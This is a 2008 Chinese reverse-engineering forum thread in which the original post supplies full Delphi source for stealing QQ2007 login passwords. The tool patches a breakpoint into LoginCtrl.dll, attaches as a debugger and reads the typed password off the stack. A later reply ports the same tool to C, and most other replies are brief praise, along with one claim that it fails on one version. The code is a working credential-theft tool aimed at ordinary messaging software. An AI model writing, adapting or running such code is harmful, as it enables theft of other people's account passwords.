首页
社区
课程
招聘
利用Debug Api 获得QQ2007密码
发表于: 2008-3-4 12:52 43980

利用Debug Api 获得QQ2007密码

2008-3-4 12:52
43980

随手写写的代码.这是上年的代码.2008版同样可以在ESP+24读取密码.只不过下断位置不同罢了.

{*******************************************************}
{                                                       }
{       利用Debug Api 获得QQ2007密码                    }
{   只支持QQ2007版本为7.1.576.1763或7.0.431.1723        }
{       版权所有 (C) 2008 Open[x.g.c]                   }
{                                                       }
{*******************************************************}

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, ComCtrls,psapi,StrUtils;

type
  TForm1 = class(TForm)
    Button1: TButton;
    Label1: TLabel;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
const
    Code :DWORD = $CC;
    JCode :DWORD =$8D;
implementation

{$R *.dfm}
var
  ProcessID: DWORD;

function HexToInt(HexStr: string): Int64;
var
  RetVar: Int64;
  i: byte;
begin
  HexStr := UpperCase(HexStr);
  if HexStr[length(HexStr)] = 'H' then
    Delete(HexStr, length(HexStr), 1);
  RetVar := 0;
  for i := 1 to length(HexStr) do begin
    RetVar := RetVar shl 4;
    if HexStr[i] in ['0'..'9'] then
      RetVar := RetVar + (byte(HexStr[i]) - 48)
    else
      if HexStr[i] in ['A'..'F'] then
        RetVar := RetVar + (byte(HexStr[i]) - 55)
      else begin
        Retvar := 0;
        break;
      end;
  end;
  Result := RetVar;
end;

function GetMem(nOK        :THANDLE;Addr:DWORD;len:integer=0):string;
const FindCount=100;
var
    buf1:array[0..FindCount] of pchar ;
    OK  :BOOL;
    nSize: DWORD;
    lpNumberOfBytesRead:cardinal;
    res,tmp:string;
    s:array[0..FindCount] of string;
    i:integer;
begin
  if len<>0 then begin
    nSize:=len ;
          buf1[0]:=AllocMem(nSize);
    OK :=ReadProcessMemory(nOK,Pointer(addr),buf1[0],nSize,lpNumberOfBytesRead);
    if(OK or (nSize<>lpNumberOfBytesRead)) then begin
      s[0]:='';
      for i :=0  to nSize-1 do  begin
        s[0] := s[0] + format('%.2X',[ord(buf1[0][i])]);
      end;
    end;
    FreeMem(buf1[0], nSize);
          tmp:=s[0];
    i:=1;
    res:='';
    while i<length(tmp) do begin
            res:=res+chr(HexToInt(copy(tmp,i,2)));
      inc(i,2);
    end;
    result:=res;
    exit;
  end;
end;

procedure NewProcess;
  var
      I: Integer;
      Count: DWORD;
      ModHandles: array[0..$3FFF - 1] of DWORD;
      ModInfo: TModuleInfo;
      ModName: array[0..MAX_PATH] of char;
      Num : Cardinal;
      Rc,ok :Boolean;
      DebugD: DEBUG_EVENT;
      Context: _CONTEXT;
      base: Pointer;
      ProcHand : THandle;
      ThreadHandle :THandle;
      EAX : string;
begin
      ProcHand := OpenProcess(PROCESS_ALL_ACCESS,False,ProcessID);
      if ProcHand <> 0 then
   try
      EnumProcessModules(ProcHand,@ModHandles,SizeOf(ModHandles),Count);
          for I :=0 to (Count div SizeOf(DWORD)) - 1 do
              if (GetModuleFileNameEx(ProcHand,ModHandles[I],ModName,SizeOf(ModName)) > 0) and GetModuleInformation(ProcHand,
                  ModHandles[I],@ModInfo,SizeOf(ModInfo)) and (RightStr(UpperCase(ModName),13)= 'LOGINCTRL.DLL') then
                   begin
                     if  DWord(ModInfo.EntryPoint) - Dword(ModInfo.lpBaseOfDll) = $22C3A then
                     base :=  Pointer(DWord(ModInfo.lpBaseOfDll)+$15C90);
                     if  DWord(ModInfo.EntryPoint) - Dword(ModInfo.lpBaseOfDll) = $2043A then
                     base :=  Pointer(DWord(ModInfo.lpBaseOfDll)+$148A3);
                     ok := WriteProcessMemory(ProcHand,base,@Code,1,Num);
                     if not ok then Exit;
                     if  not DebugActiveProcess(ProcessID) then  Exit;
                     Rc := True;
     while WaitForDebugEvent(DebugD, INFINITE) do
       begin
         case DebugD.dwDebugEventCode of
            EXIT_PROCESS_DEBUG_EVENT:
         begin
            Form1.Label1.Caption := '被调试进程中止';
            Break;
           end;
            CREATE_PROCESS_DEBUG_EVENT:
         begin
            ThreadHandle := DebugD.CreateProcessInfo.hThread;
            Form1.Label1.Caption := '请输入密码点登录';
          end;
             EXCEPTION_DEBUG_EVENT:
         begin
           case DebugD.Exception.ExceptionRecord.ExceptionCode of
             EXCEPTION_BREAKPOINT:
      begin
         if  base = DebugD.Exception.ExceptionRecord.ExceptionAddress then
         begin
           Context.ContextFlags := CONTEXT_FULL;
           GetThreadContext(ThreadHandle, Context);
           EAX := Trim(GetMem(ProcHand,Context.Esp + $24,20));
           Form1.Label1.Caption := 'QQ密码:' + EAX  ;
           Rc := WriteProcessMemory(ProcHand,Pointer(dword(base)),@JCode,1,Num);
           Context.Eip := dword(base);
           SetThreadContext(ThreadHandle, Context);
        end;
      end;
   end;
       end;
      end;
    if Rc then
      ContinueDebugEvent(DebugD.dwProcessId, DebugD.dwThreadId,DBG_CONTINUE)
    else
      ContinueDebugEvent(DebugD.dwProcessId, DebugD.dwThreadId, DBG_EXCEPTION_NOT_HANDLED);
    end;
      CloseHandle(ThreadHandle);
  end;
      finally
          CloseHandle(ProcHand);
      end;
  end;

procedure TForm1.Button1Click(Sender: TObject);
var
  h: HWND;
  ThreadID: THandle;
begin
  h := FindWindow(nil,'QQ用户登录');
  if h = 0 then
begin
  Form1.Label1.Caption := '没有找到QQ登录框'  ;
  Exit;
end;
  GetWindowThreadProcessId(h,ProcessID) ;
  CreateThread(nil, 0, @NewProcess, nil, 0, ThreadID) ;
end;

end.


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 7
支持
分享
最新回复 (84)
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
我刁。。
丫。。。
2008-3-4 13:01
0
雪    币: 6075
活跃值: (2236)
能力值: (RANK:1060 )
在线值:
发帖
回帖
粉丝
3
LoginCtrl.dll里面是明文,字符中间插入固定长度的垃圾
2008-3-4 13:12
0
雪    币: 321
活跃值: (271)
能力值: ( LV13,RANK:1050 )
在线值:
发帖
回帖
粉丝
4
顶起来学习...
2008-3-4 13:38
0
雪    币: 716
活跃值: (162)
能力值: ( LV9,RANK:250 )
在线值:
发帖
回帖
粉丝
5
去看看,
2008-3-4 13:48
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
学习了~劫下了
2008-3-4 13:52
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
看来 。。QQ  危咦。。。呵呵
2008-3-4 20:03
0
雪    币: 243
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
8
收藏学习....
2008-3-4 22:02
0
雪    币: 243
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
昏倒。。。。。那还叫什么NP保护。。。。。。。。。。。这也破的太简单了!!
2008-3-4 22:19
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
收藏学习....
2008-3-5 08:23
0
雪    币: 707
活跃值: (1301)
能力值: ( LV9,RANK:190 )
在线值:
发帖
回帖
粉丝
11
收藏代码,经典!!!
2008-3-5 09:57
0
雪    币: 201
活跃值: (27)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
额...........好邪恶的东西....令人有做坏事的冲动
2008-3-5 13:38
0
雪    币: 347
活跃值: (30)
能力值: ( LV9,RANK:420 )
在线值:
发帖
回帖
粉丝
13
收藏起来学习
2008-3-5 14:17
0
雪    币: 197
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
又是可恶的delphi
2008-3-5 14:57
0
雪    币: 92
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
谢谢了,可惜没delphi编译器,呵呵
2008-3-5 15:17
0
雪    币: 207
活跃值: (14)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
16
参照楼主代码,改写成了C语言版,以方便像我一样看DELPHI晕的人。代码写的不好,大家见笑了。

	HWND hWnd			= NULL;
	HANDLE QQhandle		= NULL;
	HANDLE threadHandle = NULL;

	HMODULE modArr[1024]	= {0};
	MODULEINFO modInfo		= {0};
	char modName[MAX_PATH]	= {0};
	char password[100]		={0};
	
	DWORD dwPid		= 0;
	DWORD dwNumMod	= 0;
	DWORD dwWriten	= 0;
	DWORD code		= 0xCC;
	DWORD oriCode	= 0x8D;

	BOOL bContinue	= FALSE;
	LPVOID base		= NULL;
	DEBUG_EVENT dEvnt = {0}; 
	CONTEXT thContext = {0};
	CString strPass;
	
	hWnd = ::FindWindow(NULL,"QQ用户登录");
	if(!hWnd)
	{
		AfxMessageBox("未找到QQ用户登录窗口!");
		return 0;
	}
	
	GetWindowThreadProcessId(hWnd,&dwPid);
	
	QQhandle = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);
	if(!QQhandle)
	{
		AfxMessageBox("不能打开QQ进程!");
		return 0;
	}

	if(!EnumProcessModules(QQhandle,modArr,sizeof(modArr),&dwNumMod))
	{
		AfxMessageBox("枚举QQ进程模块失败!");
		return 0;
	}

	for(DWORD i=0;i<dwNumMod/(sizeof(DWORD)-1);i++)
	{
		if(GetModuleFileNameEx(QQhandle,modArr[i],modName,sizeof(modName))>0 && 
			GetModuleInformation(QQhandle,modArr[i],&modInfo,sizeof(modInfo)) &&
			_stricmp(modName+strlen(modName)-13,"loginctrl.dll") == 0)
		{
			if(((DWORD)modInfo.EntryPoint - (DWORD)modInfo.lpBaseOfDll) == 0x22C3A)
				base = (LPVOID)((DWORD)modInfo.lpBaseOfDll+0x15C90);

			if(((DWORD)modInfo.EntryPoint - (DWORD)modInfo.lpBaseOfDll) == 0x2043A)
				base = (LPVOID)((DWORD)modInfo.lpBaseOfDll+0x148A3);

			if(!WriteProcessMemory(QQhandle,base,&code,1,&dwWriten))
			{
				AfxMessageBox("写入QQ进程失败!");
				return 0;
			}

			if(!DebugActiveProcess(dwPid))
			{
				AfxMessageBox("Debug QQ进程失败!");
				return 0;
			}

			bContinue = TRUE;

			while(WaitForDebugEvent(&dEvnt,INFINITE))
			{
				switch(dEvnt.dwDebugEventCode)
				{
					case EXIT_PROCESS_DEBUG_EVENT:
						AfxMessageBox("进程退出!");
						break;
					case CREATE_PROCESS_DEBUG_EVENT:
						threadHandle = dEvnt.u.CreateProcessInfo.hThread;
						AfxMessageBox("请输入密码点登录!");
						break;
					case EXCEPTION_DEBUG_EVENT:
						switch(dEvnt.u.Exception.ExceptionRecord.ExceptionCode)
						{
							case EXCEPTION_BREAKPOINT:
								if(dEvnt.u.Exception.ExceptionRecord.ExceptionAddress == base)
								{
									thContext.ContextFlags = CONTEXT_FULL;
									GetThreadContext(threadHandle,&thContext);

									memset(password,0,sizeof(password));
									ReadProcessMemory(QQhandle,(LPVOID)(thContext.Esp+0x24),password,sizeof(password),&dwWriten);

									strPass.Format("QQ密码:%s",password);
									AfxMessageBox(strPass);

									WriteProcessMemory(QQhandle,base,&oriCode,1,&dwWriten);
									thContext.Eip = (DWORD)base;
									SetThreadContext(threadHandle,&thContext);

									break;
								}
						}
				}
				if(bContinue)			
					ContinueDebugEvent(dEvnt.dwProcessId,dEvnt.dwThreadId,DBG_CONTINUE);
				else
					ContinueDebugEvent(dEvnt.dwProcessId,dEvnt.dwThreadId,DBG_EXCEPTION_NOT_HANDLED);
			}			

			CloseHandle(QQhandle);
			CloseHandle(threadHandle);

			break;
		}
	}
2008-3-5 23:16
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
值得看看好久 没来了!
2008-3-5 23:58
0
雪    币: 193
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
QQ怎么调试呀?>
2008-3-6 11:30
0
雪    币: 200
活跃值: (230)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
代码不错,支持一下!
2008-3-6 19:05
0
雪    币: 248
活跃值: (42)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
20
有ASM的没?DEPHI不懂呀。。
哪位仁兄翻译下。
2008-3-7 15:06
0
雪    币: 6075
活跃值: (2236)
能力值: (RANK:1060 )
在线值:
发帖
回帖
粉丝
21
全是API调用,你要ASM有啥用
2008-3-7 15:39
0
雪    币: 216
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
22
谢了,delphi,没编译器
2008-3-7 16:23
0
雪    币: 299
活跃值: (25)
能力值: ( LV10,RANK:170 )
在线值:
发帖
回帖
粉丝
23
明文密码???

是不是哦,腾讯公司对密码挺负责的呀!!!
2008-3-7 16:39
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
24
没用的技术   
瞎起哄~  
对 7.0.431.1723  版根本没用···
现在看贴的人    怎么没测试就 说好好好 `   !!
2008-3-7 17:49
0
雪    币: 609
活跃值: (237)
能力值: ( LV12,RANK:441 )
在线值:
发帖
回帖
粉丝
25
很好很强大……
2008-3-7 18:53
0
游客
登录 | 注册 方可回帖
返回
//